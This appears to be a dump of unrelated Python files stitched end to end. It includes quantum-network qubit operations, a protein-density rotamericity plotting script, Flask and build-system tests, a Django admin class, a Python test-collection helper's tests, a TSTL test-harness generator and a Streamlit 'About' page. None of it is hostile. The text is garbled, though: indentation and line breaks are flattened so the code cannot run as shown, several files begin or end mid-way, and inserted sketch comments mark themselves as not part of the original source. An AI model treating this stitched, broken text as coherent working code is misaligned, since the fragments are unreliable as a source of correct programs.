send_ent(self, receiver_id, pre_allocated=True): """ Operation to send an EPR pair Args: receiver_id (str): ID of the computing host which receives the EPR pair pre_allocated (bool): Boolean value which determines if the qubit is pre_allocated or not """ op = Operation( name=Constants.SEND_ENT, qids=[self._q_id], computing_host_ids=[self.computing_host_id, receiver_id], pre_allocated_qubits=pre_allocated, ) self.update_layer(self.current_layer + 1) self._update_operations(op) def rec_ent(self, sender_id, pre_allocated=True): """ Operation to receive an EPR pair Args: sender_id (str): ID of the computing host which sends the EPR pair pre_allocated (bool): Boolean value which determines if the qubit is pre_allocated or not """ op = Operation( name=Constants.REC_ENT, qids=[self._q_id], computing_host_ids=[self.computing_host_id, sender_id], pre_allocated_qubits=pre_allocated, ) 
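# --- Illustrative sketch (not part of the original source) ---------------
# two_qubit above (and the classical send/receive operations below) keep the
# two participating qubits on the same circuit layer: both are advanced to
# one past the deeper of the two current layers.  A minimal, hedged sketch
# of that synchronisation rule on its own:
def next_shared_layer(layer_a, layer_b):
    # both parties end up on max(layer_a, layer_b) + 1
    return max(layer_a, layer_b) + 1

assert next_shared_layer(2, 5) == 6
assert next_shared_layer(4, 1) == 5
# --------------------------------------------------------------------------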
self.update_layer(self.current_layer + 1) self._update_operations(op) def send_classical(self, bit_id, receiver_qubit): """ Operation to send a classical bit Args: bit_id (str): ID of the bit which has to be sent receiver_qubit (Qubit): Qubit which receives the classical bit """ op = Operation( name=Constants.SEND_CLASSICAL, cids=[bit_id], computing_host_ids=[ self.computing_host_id, receiver_qubit.computing_host_id, ], ) if receiver_qubit.current_layer + 1 > self.current_layer + 1: receiver_qubit.update_layer(receiver_qubit.current_layer + 1) self.update_layer(receiver_qubit.current_layer + 1) else: receiver_qubit.update_layer(self.current_layer + 1) self.update_layer(self.current_layer + 1) self._update_operations(op) def rec_classical(self, bit_id, sender_qubit): """ Operation to receive a classical bit Args: bit_id (str): ID of the bit which has to be sent sender_qubit (Qubit): Qubit which sends the classical bit """ op = Operation( name=Constants.REC_CLASSICAL, cids=[bit_id], computing_host_ids=[self.computing_host_id, sender_qubit.computing_host_id], ) if sender_qubit.current_layer + 1 > self.current_layer + 1: sender_qubit.update_layer(sender_qubit.current_layer + 1) self.update_layer(sender_qubit.current_layer + 1) else: sender_qubit.update_layer(self.current_layer + 1) self.update_layer(self.current_layer + 1) self._update_operations(op) def measure(self, bit_id=None): """ Operation to measure the qubit Args: bit_id (str): ID of the bit where the result of the measurement has to be stored """ if bit_id is None: bit_id = self.q_id op = Operation( name=Constants.MEASURE, qids=[self.q_id], cids=[bit_id], computing_host_ids=[self.computing_host_id], ) self.update_layer(self.current_layer + 1) self._update_operations(op) 1-10 # Rolling rotamericity metric ######################################################################## # Package imports import numpy as np import math from emringer import ringer_chi, ringer_residue from libtbx import easy_pickle import matplotlib.pyplot as plt import argparse from matplotlib import rcParams from itertools import count, groupby rcParams['figure.autolayout'] = True rcParams['xtick.labelsize'] = 16 rcParams['ytick.labelsize'] = 16 rcParams['axes.labelsize'] = 24 rcParams['axes.titlesize'] = 24 Residue_codes = ["ARG","ASN","ASP","CYS","GLU","GLN","HIS", "LEU","LYS","MET","PHE","SER","TRP","TYR","SEC","PYL"] Branched_residues = ["THR","VAL","ILE"] No_c_gamma = ["ALA", "GLY"] Weird = ["PRO"] ######################################################################## # Argument Parsing parser = argparse.ArgumentParser() parser.add_argument("-a", "--file_a", dest="filename_a", help='Filename of unrefined pkl file') parser.add_argument("-b", "--file_b", dest="filename_b", help='Filename of refined pkl file') parser.add_argument("-o", dest="offset", type=int, default=0) parser.add_argument("-t", "--threshold", dest="threshold", help='Threshold cutoff for rho density', nargs='?', type = float, default=0) parser.add_argument("-w", "--extension_around_center", dest = "extension", help='Number of amino acids to extend around the center in both directions. \ The total window will therefore be twice this number plus one for the center.' , nargs="?", type=int, default=10) parser.add_argument("--percent_passing_cutoff", dest = "thresholded_cutoff", help='Minimum %% passing threshold to flag as a bad region...' , nargs="?", type=float, default=0.8) parser.add_argument("--rotamericity_cutoff", dest = "rotamer_cutoff", help='Maximum rotamericity to be flagged.' 
, nargs="?", type=float, default=0.5) parser.add_argument("--display", dest = "graph", action='store_true') parser.add_argument("--no_save", dest = "save", action='store_false') parser.add_argument("-r", "--rel", dest = "rel", action='store_true') parser.set_defaults(rel=False, graph=False, save=True) args = parser.parse_args() class RingerDict(object): '''Ringerdict: A dictionary accessible form of the output of ringer''' def __init__(self, resultlist, offset): self.dict = {} for residue in resultlist: if residue.resname in Residue_codes: residue.resid = int(residue.resid)+offset self.add_residue(residue) def add_residue(self, residue): if residue.chain_id not in self.dict.keys(): self.dict[residue.chain_id] = {} if 1 in residue._angles.keys(): self.dict[residue.chain_id][residue.resid] = residue._angles[1] def get_peak(self, chain_id, residue_id): if (chain_id in self.dict.keys() and residue_id in self.dict[chain_id].keys()): return self.dict[chain_id][residue_id] else: return None def get_chains(self): return self.dict.keys() def get_residues(self, chain_id): return sorted(self.dict[chain_id].keys()) def ranges(p): q = sorted(p) i = 0 for j in xrange(1,len(q)): if q[j] > 1+q[j-1]: yield (q[i],q[j-1]) i = j yield (q[i], q[-1]) def identify_regions(results): for chain, chain_out in results.iteritems(): outliers = [] print "For Chain %s:" % chain for k in chain_out: if (np.divide(k[2],k[1]) > args.thresholded_cutoff) and (np.divide(k[3],k[2]) < args.rotamer_cutoff): for i in range(k[0]-args.extension, k[0]+args.extension): outliers.append(i) if len(outliers) > 0: print list(ranges(outliers)) print "" else: print "No outliers at this threshold \n" def main(): ringer_results = easy_pickle.load(args.filename_a) hierarchy = RingerDict(ringer_results, 0) results_a = {} for chain in hierarchy.get_chains(): results_a[chain] = [] # Results will be a list of tuples of the form residue number, # number checked in window, number passing threshold in window, # number deviating in window. for i in hierarchy.get_residues(chain): total_n = 0.0 threshold_n = 0.0 # threshold_deviation = 0 n_deviate = 0.0 for j in range(-args.extension, args.extension+1): chi = hierarchy.get_peak(chain, int(i)+j) if chi: total_n += 1 if args.rel: if chi.relrho > args.threshold: threshold_n += 1 if chi.deviation <= 30: n_deviate += 1 else: if chi.peakrho > args.threshold: threshold_n += 1 if chi.deviation <= 30: n_deviate += 1 results_a[chain].append((i, total_n, threshold_n, n_deviate)) ringer_results = easy_pickle.load(args.filename_b) hierarchy = RingerDict(ringer_results, args.offset) results_b = {} for chain in hierarchy.get_chains(): results_b[chain] = [] # Results will be a list of tuples of the form residue number, # number checked in window, number passing threshold in window, # number deviating in window. 
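# --- Illustrative sketch (not part of the original source) ---------------
# The loop that follows builds, for every residue, a rolling window of
# +/- args.extension neighbours and records (residue, n_checked,
# n_passing_threshold, n_rotameric); the rotamericity that is later plotted
# is n_rotameric / n_passing_threshold.  A small, hedged sketch of that
# window bookkeeping with a hypothetical `peaks` dict standing in for
# RingerDict.get_peak (the rel/peak density choice is omitted here):
def window_counts(peaks, resid, extension, threshold):
    total = passing = rotameric = 0
    for offset in range(-extension, extension + 1):
        chi = peaks.get(resid + offset)
        if chi is None:
            continue
        total += 1
        if chi['rho'] > threshold:
            passing += 1
            if chi['deviation'] <= 30:
                rotameric += 1
    return resid, total, passing, rotameric
# --------------------------------------------------------------------------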
for i in hierarchy.get_residues(chain): total_n = 0.0 threshold_n = 0.0 # threshold_deviation = 0 n_deviate = 0.0 for j in range(-args.extension, args.extension+1): chi = hierarchy.get_peak(chain, int(i)+j) if chi: total_n += 1 if args.rel: if chi.relrho > args.threshold: threshold_n += 1 if chi.deviation <= 30: n_deviate += 1 else: if chi.peakrho > args.threshold: threshold_n += 1 if chi.deviation <= 30: n_deviate += 1 results_b[chain].append((i, total_n, threshold_n, n_deviate)) # identify_regions(results) if args.graph or args.save: plot_results(results_a, results_b) def plot_results(results_a,results_b): for chain in results_a.keys(): fig, ax = plt.subplots() # plt.title("Rolling window - Chain %s" % chain) x_a = [k[0] for k in results_a[chain]] x_b = [k[0] for k in results_b[chain]] y_a = [np.divide(k[3],k[2]) for k in results_a[chain]] y_b = [np.divide(k[3],k[2]) for k in results_b[chain]] # plt.plot(x, y_1, 'b-', label = "Percent passing threshold",linewidth=3.0, alpha=0.7) plt.plot(x_a, y_a, label = "Unrefined",linewidth=3.0, alpha=0.9) plt.plot(x_b, y_b, label = "Refined",linewidth=3.0, alpha=0.9, color='#60BD68') # plt.xlim(381,695) plt.xlabel("Center Residue of 21-Residue Window", labelpad=10) plt.ylabel("Fraction Rotameric Residues", labelpad=10) plt.ylim(0,1) plt.legend(loc=4) ax.yaxis.set_ticks_position('left') # this one is optional but I still recommend it... ax.xaxis.set_ticks_position('bottom') if args.graph: fig.show() if args.save: output = args.filename_a[:-4] + "_" + chain + "_rolling.png" fig.savefig(output) if __name__ == "__main__": main() tests/test_app.py ''' test_app.py ''' from flask import url_for from tests.base import Base class TestApp(Base): def test_generic_404(self): res = self.client.get('/foo/bar') self.assertEqual(res.status_code, 404) self.assertEqual(res.json['status'], 'NOT_FOUND') def test_health(self): res = self.client.get(url_for('health')) self.assertEqual(res.status_code, 200) self.assertEqual( res.json, { 'status': 'OK', } ) def test_docs(self): res = self.client.get('/docs/') self.assertEqual(res.status_code, 200) thomasrockhu/bfg9000test/integration/test_package.py import os.path from . import * is_mingw = (env.host_platform.family == 'windows' and env.builder('c++').flavor == 'cc') class TestPackage(IntegrationTest): def __init__(self, *args, **kwargs): super().__init__(os.path.join(examples_dir, '04_package'), *args, **kwargs) def test_build(self): self.build() # XXX: This fails on MinGW (not sure why)... if not is_mingw: self.assertOutput([executable('program')], '') class TestSystemPackage(IntegrationTest): def __init__(self, *args, **kwargs): super().__init__(os.path.join(examples_dir, '04_package'), extra_env={'PKG_CONFIG': 'nonexist'}, *args, **kwargs) def test_build(self): self.build() # XXX: This fails on MinGW (not sure why)... 
if not is_mingw: self.assertOutput([executable('program')], '') @skip_if(is_mingw, 'xfail on mingw') class TestBoostPackage(IntegrationTest): def __init__(self, *args, **kwargs): super().__init__('boost', *args, **kwargs) def test_build(self): self.build() self.assertOutput([executable('program'), '--hello'], 'Hello, world!\n') class TestOpenGLPackage(IntegrationTest): def __init__(self, *args, **kwargs): super().__init__('opengl', *args, **kwargs) def test_build(self): self.build() self.assertOutput([executable('program')], '') class TestOpenGLSystemPackage(IntegrationTest): def __init__(self, *args, **kwargs): super().__init__('opengl', extra_env={'PKG_CONFIG': 'nonexist'}, *args, **kwargs) def test_build(self): self.build() self.assertOutput([executable('program')], '') youngqqcn/QBlockChainNotes from django.contrib import admin from finance.models import * from import_export import resources from import_export.admin import ImportExportModelAdmin, ImportExportActionModelAdmin class ProxyResource(resources.ModelResource): class Meta: model = Record # Register your models here. @admin.register(Record) # class RecordAdmin(admin.ModelAdmin): # class RecordAdmin(ImportExportModelAdmin): class RecordAdmin(ImportExportActionModelAdmin): resource_class = ProxyResource list_display = ('id', 'name', 'type', 'money', 'create_date') list_per_page = 10 import pytest import os import collect def test__module_name_from_path(): test = "/path/to/code/bubblewrap/tests/test_collect.py" expected = "test_collect" assert collect._module_name_from_path(test) == expected def test_filter_tests(): trial = [ "/path/to/code/bubblewrap/collect.py", "/path/to/code/bubblewrap/cli.py", "/path/to/code/bubblewrap/tests/test_collect.py", "/path/to/code/bubblewrap/utils/log.py", "/path/to/code/bubblewrap/tests/collect_test.py", "/path/to/code/bubblewrap/tests/collect_tests.py", ] trial = collect.filter_tests(trial) expected = [ "/path/to/code/bubblewrap/tests/collect_test.py", "/path/to/code/bubblewrap/tests/test_collect.py", ] # order doesn't matter so we might as well sort to make the test validate it's # at least got the same stuff assert sorted(trial) == sorted(expected) def test_ImportParser_find_imports(): root = os.getcwd() example_stable = os.path.join(root, "examples", "stable") test_path = f"{root}/examples/stable/tests/test_banana.py" exclude = [".git", "__pycache__", "__venv__", "env"] all_files = collect.walk_tree(example_stable, exclude) tests = collect.filter_tests(all_files) modules = collect.convert_app_paths_to_modules(set(all_files) - set(tests)) output = collect.ImportParser(tests=tests, app_modules=modules, module_map={})._find_imports( test_path ) expected = ( {"banana", "amazing", "blue"}, f"{root}/examples/stable/tests/test_banana.py", ) assert output == expected def test_ImportParser_submodule_name_module(): output = collect.ImportParser(tests=None, app_modules=None, module_map=None)._submodule_name( "lizard" ) expected = "lizard" assert output == expected def test_ImportParser_submodule_name_submodule(): output = collect.ImportParser(tests=None, app_modules=None, module_map=None)._submodule_name( "green.lizard" ) expected = "lizard" assert output == expected def test_ImportParser_submodule_name_subsubmodule(): output = collect.ImportParser(tests=None, app_modules=None, module_map=None)._submodule_name( "super.green.lizard" ) expected = "lizard" assert output == expected def test_example_stable_end_to_end(): root = os.getcwd() example_stable = os.path.join(root, "examples", "stable") expected = { 
"banana": [ f"{root}/examples/stable/tests/test_banana.py", f"{root}/examples/stable/tests/test_amazing.py", ], "blue": [ f"{root}/examples/stable/tests/test_banana.py", f"{root}/examples/stable/tests/test_apple.py", ], "amazing": [ f"{root}/examples/stable/tests/test_banana.py", f"{root}/examples/stable/tests/test_amazing.py", f"{root}/examples/stable/tests/test_apple.py", ], "script": [ f"{root}/examples/stable/tests/test_script.py", f"{root}/examples/stable/tests/test_apple.py", ], "apple": [f"{root}/examples/stable/tests/test_apple.py"], } # lifted from defaults in script invocation wrapper exclude = [".git", "__pycache__", "__venv__", "env"] tests = collect.collect_tests(example_stable, exclude) output = collect.map_tests_to_modules(example_stable, exclude, tests) assert sorted(output) == sorted(expected) deprecated/obsolete/src/tstl.py import sys import argparse import os import re from collections import namedtuple import pkg_resources def parse_args(): parser = argparse.ArgumentParser() parser.add_argument('-a', '--act', type=str, default=None, help='Path to the .act file.') parser.add_argument('-t', '--target', type=str, default="sut.py", help='Name of the file containing the generated harness core (default = sut.py.') parser.add_argument('-c', '--classname', type=str, default='t', help='Name of the class representing the SUT (default=t)') parser.add_argument('-n', '--nocover', action='store_true', help='Disable generating coverage collection support.') parser.add_argument('-r', '--coverreload', action='store_true', help='Generate coverage for module reload behavior.') parser.add_argument('-i', '--coverinit', action='store_true', help='Generate coverage for SUT initialization behavior.') parsed_args = parser.parse_args(sys.argv[1:]) return (parsed_args, parser) def make_config(pargs, parser): """ Process the raw arguments, returning a namedtuple object holding the entire configuration, if everything parses correctly. 
""" pdict = pargs.__dict__ if pargs.act is None: parser.print_help() raise ValueError('The .act file is not specified.') elif not os.path.exists(pargs.act): parser.print_help() raise ValueError('Cannot locate the .act file at path={}'.format(pargs.target)) if pargs.target is None: parser.print_help() raise ValueError('The target file is not specified.') # create a namedtuple object for fast attribute lookup key_list = pdict.keys() arg_list = [pdict[k] for k in key_list] Config = namedtuple('Config', key_list) nt_config = Config(*arg_list) return nt_config parsed_args, parser = parse_args() config = make_config(parsed_args, parser) print('Generating harness core using config={}'.format(config)) outf = open(config.target,'w') def parse_import_line(line): raw = line.split('import ') assert len(raw) == 2, 'import statement error in line --> {}'.format(line) # from X import Y # from X import Y as Z # import X.Y # import X.Y as Z, A.B as C raw = raw[1] # check for multiple imports subimports = [raw] if ', ' in raw: subimports = raw.split(', ') assert len(subimports) > 0 # check for aliasing mod_names = [] for si in subimports: name = None if 'as' in si: ts = si.split(' as ') assert len(ts) == 2, 'Parse error on "as" during import of {}'.format(name) name = ts[1].rstrip() # remove the trailing newline or whitespace if any else: name = si.rstrip() mod_names.append(name) assert len(mod_names) > 0 return mod_names # Handle raw python, imports outf.write("import copy\n") outf.write("import traceback\n") outf.write("import re\n") outf.write("import sys\n") if not config.nocover: outf.write("import coverage\n") code = [] import_modules = [] # we will call reload on these during restart inside_literal_block = False inside_function = False function_code = [] baseIndent = " " with open(config.act, 'r') as fp: for l in fp: if l[-1] != "\n": l = l + "\n" if l[0] == "#": continue # COMMENT if re.match("<@", l): inside_literal_block=True continue if re.match("@>", l): inside_literal_block=False continue if l[0] == "@" or inside_literal_block: if l[0] == "@": l = l[1:] if l.find("def guarded") == 0: # guarded function, append the speculation argument and continue if function_code != []: if anyPRE: outf.write(baseIndent + "__pre = {}\n") for fl in function_code: outf.write(fl) outf.write(l.replace("):",", SPECULATIVE_CALL = False):")) inside_function = True anyPRE = False function_code = [] elif l.find("def ") == 0: if function_code != []: if anyPRE: outf.write(baseIndent + "__pre = {}\n") for fl in function_code: outf.write(fl) outf.write(l) inside_function = True anyPRE = False function_code = [] elif l.find("import") == 0: outf.write(l) # import, so set up reloading module_names = parse_import_line(l) import_modules += module_names elif inside_function: if l.find("%COMMIT%") != -1: # commit point in a guarded function definition function_code.append(l.replace("%COMMIT%","if SPECULATIVE_CALL: return True")) continue m = re.match(r".*PRE\[(\S+)\].*",l) while m: anyPRE = True pre_expr = m.groups()[0] spre_expr = "'''" + pre_expr + "'''" l = l.replace("PRE[" + pre_expr + "]", "__pre[" + spre_expr + "]", 1) function_code = [(baseIndent + "__pre[" + spre_expr + "] = " + pre_expr + "\n")] + function_code m = re.match(r".*PRE\[(\S+)\].*",l) function_code.append(l) else: outf.write(l) elif l[0] == "*": # include action multiple times spos = l.find(" ") times = int(l[1:spos]) for n in xrange(0,times): code.append(l[spos:]) else: code.append(l) if function_code != []: if anyPRE: outf.write(baseIndent + "__pre = {}\n") 
for fl in function_code: outf.write(fl) assert len(code) > 0, 'No non-comment lines found in .act file' # Build up the pool, initialization values poolPrefix = "self.p_" sourceSet = [] poolSet = {} initSet = [] propSet = [] refSet = [] compareSet = [] featureSet = [] logSet = [] referenceMap = {} newCode = [] for c in code: cs = c.split() if cs == []: continue elif cs[0] == "init:": initSet.append(c.replace("init: ","")) elif cs[0] == "log:": logSet.append(c.replace("log: ","")) elif cs[0] == "property:": propSet.append(c.replace("property: ","")) elif cs[0] == "pool:": poolSet[cs[1]] = int(cs[2]) if (len(cs)>3) and (cs[3] == "REF"): refSet.append(cs[1]) poolSet[cs[1]+"_REF"] = int(cs[2]) elif cs[0] == "reference:": baseRefSplit = c.split("reference: ")[1] rs = baseRefSplit.split(" ==> ") referenceMap[rs[0]] = rs[1][:-1] elif cs[0] == "feature:": featureSet.append(cs[1]) elif cs[0] == "compare:": compareSet.append(cs[1]) elif cs[0] == "source:": sourceSet.append(cs[1]) else: newCode.append(c) code = newCode # Expand pool references def expandPool(original): newVersion = [] for c in original: for p in poolSet: pexpr = p + " [%[0.." + str(poolSet[p]-1) + "]%]" c = c.replace(p, pexpr) newVersion.append(c) return newVersion code = expandPool(code) propSet = expandPool(propSet) initSet = expandPool(initSet) logSet = expandPool(logSet) # Expand all range expressions def expandRange(original): current = original anyChanged = True while anyChanged: anyChanged = False newVersion = [] for c in current: if "%[" in c: anyChanged = True lpos = c.find("%[") dotpos = c.find("..",lpos) endpos = c.find("]%",dotpos) low = int(c[lpos+2:dotpos]) high = int(c[dotpos+2:endpos]) rexp = c[lpos:endpos+2] for x in xrange(low,high+1): newVersion.append(c.replace(rexp, str(x), 1)) else: newVersion.append(c) current = newVersion return newVersion code = expandRange(code) propSet = expandRange(propSet) initSet = expandRange(initSet) logSet = expandRange(logSet) # Finally go ahead and directly reference pools in preds and initalizers newProps = [] for c in propSet: newProps.append((c,[])) propSet = newProps for p in poolSet: newProps = [] for (c,u) in propSet: uses = u found = c.find(p) while (found != -1): use = c[found:c.find("]", found)+1] use = use.replace(p + " ", poolPrefix + p.replace("%","")) uses.append(use) found = c.find(p,found+1) newProps.append((c.replace(p + " ", poolPrefix + p.replace("%","")),uses)) propSet = newProps for p in poolSet: newInits = [] for c in initSet: newInits.append(c.replace(p + " ", poolPrefix + p.replace("%",""))) initSet = newInits for p in poolSet: newLogs = [] for c in logSet: newLogs.append(c.replace(p + " ", poolPrefix + p.replace("%",""))) logSet = newLogs newLogs = [] for l in logSet: refl = l for p in poolSet: if p in refSet: pRaw = poolPrefix + p.replace("%","") refl = l.replace(pRaw,pRaw+"_REF") if refl != l: for base in referenceMap: refl = re.sub(base,referenceMap[base],refl) newLogs.append(l) if refl != l: newLogs.append(refl) logSet = newLogs # Now generate the action and guard code outf.write("class " + config.classname + "(object):\n") genCode = [] actCount = 0 def genAct(): global actCount s = "act" + str(actCount) actCount += 1 return s guardCount = 0 def genGuard(): global guardCount s = "guard" + str(guardCount) guardCount += 1 return s actDefs = [] for corig in code: act = genAct() guard = genGuard() guardCode = "True" guardConds = [] changes = [] okExcepts = "" if corig[0] == "{": c = corig[corig.find("}")+1:] while c[0] == " ": c = c[1:] for e in 
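# --- Illustrative sketch (not part of the original source) ---------------
# expandRange above rewrites every '%[low..high]%' occurrence into one copy
# of the line per integer in that range.  A compact, hedged re-statement of
# the same expansion for a single line:
import re

def expand_ranges(line):
    m = re.search(r"%\[(\d+)\.\.(\d+)\]%", line)
    if not m:
        return [line]
    low, high = int(m.group(1)), int(m.group(2))
    out = []
    for value in range(low, high + 1):
        out.extend(expand_ranges(line.replace(m.group(0), str(value), 1)))
    return out

assert expand_ranges("list%[0..2]%.append(x)") == [
    "list0.append(x)", "list1.append(x)", "list2.append(x)"]
# --------------------------------------------------------------------------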
corig[1:corig.find("}")].split(","): okExcepts += e + "," okExcepts = okExcepts[:-1] else: c = corig newC = c eqPos = c.find(":=") if eqPos == -1: eqPos = 0 lhsUse = [] rhsUse = [] for p in poolSet: newC = newC.replace(p + " ", poolPrefix + p.replace("%","")) newC = newC.replace(p, poolPrefix + p.replace("%","")) plhs = [] prhs = [] found = c.find(p) while (found != -1): use = c[found:c.find("]", found)+1] twiddle = (found > 0) and (c[found-1]=='~') if (found >= eqPos): prhs.append((use,twiddle)) else: plhs.append(use) found = c.find(p,found+1) for assign in plhs: g = assign g = g.replace("%","") g = poolPrefix + g g = g.replace(" ","") gval = g g = g.replace("[", "_used[") gguard = "((" + g + ") or (" + gval + " == None))" guardConds.append(gguard) changes.append(g + "=False") for (used,twiddle) in prhs: g = used g = g.replace("%","") g = poolPrefix + g g = g.replace(" ","") if (not twiddle): changes.append(g.replace("[","_used[") + "=True") g += " != None" guardConds.append(g) newC = newC.replace(":=","=") newC = newC.replace("~"+poolPrefix,poolPrefix) refC = newC for p in poolSet: if p in refSet: pRaw = poolPrefix + p.replace("%","") refC = refC.replace(pRaw,pRaw+"_REF") for base in referenceMap: refC = re.sub(base,referenceMap[base],refC) comparing = False for comp in compareSet: if re.match(".*" + comp + ".*", newC): if refC != newC: newC = "__result = " + newC refC = "__result_REF = " + refC comparing = True genCode.append("def " + act + "(self):\n") if logSet != []: genCode.append(baseIndent + "self.log()\n") if not config.nocover: genCode.append(baseIndent + "if self.__collectCov:\n") genCode.append(baseIndent + baseIndent + "self.__cov.start()\n") genCode.append(baseIndent + "try:\n") genCode.append(baseIndent + baseIndent + newC + "\n") if okExcepts != "": genCode.append(baseIndent + "except (" + okExcepts + "):\n") genCode.append(baseIndent + baseIndent + "pass\n") genCode.append(baseIndent + "finally:\n") genCode.append(baseIndent + baseIndent + "if self.__collectCov:\n") genCode.append(baseIndent + baseIndent + baseIndent + "self.__cov.stop()\n") genCode.append(baseIndent + baseIndent + baseIndent + "self.__updateCov()\n") else: genCode.append(baseIndent + newC + "\n") if refC != newC: genCode.append(baseIndent + refC + "\n") if comparing: genCode.append(baseIndent + "assert __result == __result_REF, \" (%s) == (%s) \" % (__result, __result_REF)\n") for ch in changes: genCode.append(baseIndent + ch + "\n") for g in guardConds: guardCode += " and (" + g + ")" if newC.find("guarded") == 0: guardCode += " and (" + newC.replace(")\n",",True))") genCode.append("def " + guard + "(self):\n") genCode.append(baseIndent + "return " + guardCode + "\n") d = "self.__actions.append((" d += "'''" + newC[:-1] +" '''," d += "self." + guard + "," d += "self." + act + "))\n" actDefs.append(d) d = "self.__names[" + "'''" + newC[:-1] + " '''] = (" d += "'''" + newC[:-1] + " '''," d += "self." + guard + "," d += "self." 
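# --- Illustrative sketch (not part of the original source) ---------------
# The block above peels an optional '{ExcA,ExcB}' prefix off an action line;
# the named exceptions are then treated as acceptable when the generated
# action runs.  A hedged sketch of just that prefix parsing:
def split_ok_exceptions(action_line):
    if not action_line.startswith('{'):
        return '', action_line
    close = action_line.find('}')
    excepts = action_line[1:close].replace(' ', '')
    return excepts, action_line[close + 1:].lstrip()

assert split_ok_exceptions('{IndexError,KeyError} list1 [%[0..2]%].pop()') == \
    ('IndexError,KeyError', 'list1 [%[0..2]%].pop()')
# --------------------------------------------------------------------------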
+ act + ")\n" actDefs.append(d) def genInitialization(): for p in poolSet: s = baseIndent s += poolPrefix + p.replace("%","") + " = {}" genCode.append(s + "\n") s = baseIndent s += poolPrefix + p.replace("%","") + "_used = {}" genCode.append(s + "\n") for x in xrange(0,poolSet[p]+1): s = baseIndent s += poolPrefix + p.replace("%","") + "[" + str(x) + "] = None" genCode.append(s + "\n") s = baseIndent s += poolPrefix + p.replace("%","") + "_used[" + str(x) + "] = True" genCode.append(s + "\n") if (not config.nocover) and config.coverinit: genCode.append(baseIndent + "if self.__collectCov: self.__cov.collector.start()\n") for i in initSet: s = baseIndent s += i genCode.append(s) if (not config.nocover) and config.coverinit: genCode.append(baseIndent + "if self.__collectCov: self.__cov.collector.stop()\n") genCode.append(baseIndent + "if self.__collectCov: self.__updateCov()\n") genCode.append("def __init__(self):\n") genCode.append(baseIndent + "self.__features = []\n") for f in featureSet: genCode.append(baseIndent + 'self.__features.append(r"' + f + '")\n') if not config.nocover: covc = baseIndent + "self.__cov = coverage.coverage(branch=True, source=[" for s in sourceSet: covc += '"' + s + '",' if len(sourceSet) > 0: covc = covc[:-1] genCode.append(covc + "])\n") genCode.append(baseIndent + "self.__collectCov = True\n") genCode.append(baseIndent + "self.__allBranches = set()\n") genCode.append(baseIndent + "self.__allStatements = set()\n") genCode.append(baseIndent + "self.__newBranches = set()\n") genCode.append(baseIndent + "self.__newStatements = set()\n") genCode.append(baseIndent + "self.__currBranches = set()\n") genCode.append(baseIndent + "self.__currStatements = set()\n") genCode.append(baseIndent + "self.__newCurrBranches = set()\n") genCode.append(baseIndent + "self.__newCurrStatements = set()\n") genInitialization() genCode.append(baseIndent + "self.__actions = []\n") genCode.append(baseIndent + "self.__names = {}\n") genCode.append(baseIndent + "self.__failure = None\n") genCode.append(baseIndent + "self.__log = None\n") genCode.append(baseIndent + "self.__logAction = self.logPrint\n") for d in actDefs: genCode.append(baseIndent + d + "\n") genCode.append(baseIndent + "self.__actions_backup = list(self.__actions)\n") genCode.append("def restart(self):\n") if not config.nocover: genCode.append(baseIndent + "self.__currBranches = set()\n") genCode.append(baseIndent + "self.__currStatements = set()\n") genCode.append(baseIndent + "self.__newCurrBranches = set()\n") genCode.append(baseIndent + "self.__newCurrStatements = set()\n") if config.coverreload: genCode.append(baseIndent + "if self.__collectCov: self.__cov.collector.start()\n") for l in import_modules: s = baseIndent + 'reload({})\n'.format(l) genCode.append(s) if (not config.nocover) and config.coverreload: genCode.append(baseIndent + "if self.__collectCov: self.__cov.collector.stop()\n") genCode.append(baseIndent + "if self.__collectCov: self.__updateCov()\n") genInitialization() genCode.append("def log(self):\n") if logSet != []: genCode.append(baseIndent + "if self.__log == None:\n") genCode.append(baseIndent + baseIndent + "return\n") for l in logSet: ls = l.split() try: level = int(ls[0]) lcode = l[l.find(ls[1]):] except ValueError: level = 0 lcode = l genCode.append(baseIndent + "if (self.__log == 'All') or (self.__log >= " + str(level) + "):\n") genCode.append(baseIndent + baseIndent + "try:\n") genCode.append(baseIndent + baseIndent + baseIndent + "self.__logAction(" + '"""' + lcode[:-1] + '""",' + lcode[:-1] + 
")\n") genCode.append(baseIndent + baseIndent + "except:\n") genCode.append(baseIndent + baseIndent + baseIndent + "pass\n") else: genCode.append(baseIndent + "pass\n") genCode.append("def state(self):\n") st = baseIndent + "return [ " for p in poolSet: st += "copy.deepcopy(" + poolPrefix + p.replace("%","") + ")," st += "copy.deepcopy(" + poolPrefix + p.replace("%","") + "_used)," st = st[:-1] genCode.append(st + "]\n") genCode.append("def backtrack(self,old):\n") n = 0 for p in poolSet: genCode.append(baseIndent + poolPrefix + p.replace("%","") + " = copy.deepcopy(old[" + str(n) + "])\n") n += 1 genCode.append(baseIndent + poolPrefix + p.replace("%","") + "_used = copy.deepcopy(old[" + str(n) + "])\n") n += 1 if len(poolSet) == 0: genCode.append(baseIndent + "pass\n") genCode.append("def check(self):\n") if propSet != []: genCode.append(baseIndent + "try:\n") if not config.nocover: genCode.append(baseIndent + baseIndent + "if self.__collectCov:\n") genCode.append(baseIndent + baseIndent + baseIndent + "self.__cov.start()\n") for (p, u) in propSet: if u != []: pr = baseIndent + baseIndent + "if True" for use in u: pr += " and (" + use + " != None)" pr += ":\n" genCode.append(pr) genCode.append(baseIndent + baseIndent + baseIndent + "assert " + p + "\n") else: genCode.append (baseIndent + baseIndent + "assert " + p + "\n") genCode.append(baseIndent + "except:\n") genCode.append(baseIndent + baseIndent + "self.__failure = sys.exc_info()\n") genCode.append(baseIndent + baseIndent + "return False\n") if not config.nocover: genCode.append(baseIndent + "finally:\n") genCode.append(baseIndent + baseIndent + "if self.__collectCov:\n") genCode.append(baseIndent + baseIndent + baseIndent + "self.__cov.stop()\n") genCode.append(baseIndent + baseIndent + baseIndent + "self.__updateCov()\n") genCode.append(baseIndent + "return True\n") for c in genCode: outf.write(baseIndent + c.replace("True and (","(")) for l in open("boilerplate.py"): outf.write(baseIndent + l) if not config.nocover: for l in open("boilerplate_cov.py"): outf.write(baseIndent + l) outf.close() 0 __author__ = '' from Main_Window_Handler import Main_Window_Handler about.py0 import streamlit as st def app(): st.write("# About") col1, col2, col3 = st.columns([5,2,5]) with col1: st.image("davide.jpg") st.write("### ") st.write("Ricercatore PostDoc all'Università SISSA di Trieste") st.write("Ideatore principale di concept, metriche e grafici") st.write("[Website](https://davidetorlo.it/), [Twitter](https://twitter.com/accdavlo)") with col3: st.image("fede_new.jpeg") st.write("### ") st.write("Ricercatore PostDoc all'Università Bocconi di Milano") st.write("Support alla realizzazione della webapp e deploy") st.write("[Website](https://federicobianchi.io/), 